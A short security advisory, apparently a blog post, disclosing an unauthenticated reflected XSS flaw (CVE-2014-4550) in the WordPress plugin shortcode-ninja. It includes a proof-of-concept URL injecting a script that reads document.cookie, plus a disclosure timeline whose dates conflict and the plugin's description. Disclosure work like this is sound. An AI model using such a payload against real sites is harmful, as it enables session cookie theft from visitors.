wp-plugin : shortcode-ninja – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : shortcode-ninja

 

Effected Version : 1.4 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4550

 
Plugin Description :
 
Preview and customize WooThemes shortcodes before inserting them. This plugin
adds the Shortcode Ninja button to the Visual Editor.

Click on the Ninja button and pick one of the many WooThemes shortcodes from the
list. You can set shortcode attribues and see a preview of the result before
inserting the shortcode into the post. The active theme must be from
WooThemes.com with a recent version of the WooFramework installed.

= List of Features =

* **All Shortcodes In One Place**

    No need to memorize all shortcodes. Access all 18 built-in WooThemes shortcodes from the Ninja Button in the Visual Editor.

* **Live Preview**

    Customized shortcode or the default look – either way you see a preview of what the result will look like in the post.

* **Create Column Layouts Like a Pro**

    Decide how many columns you want. Click on the different column sizes to add them. Insert. Done.

* **Automatic Link Validation**

    Gone are the days of broken download links! Ninja link validation is included.

* **Works with all themes from WooThemes.com**

    WooThemes are based on the WooFramework. The framework comes with a huge set of
    shortcodes to create buttons, info boxes, column layouts, social buttons,
    and more.

= Note =

Plugin was tested with WordPress version 2.9.2 to 3.0.1, but may work with older
versions, too.

Leave a Reply

Your email address will not be published. Required fields are marked *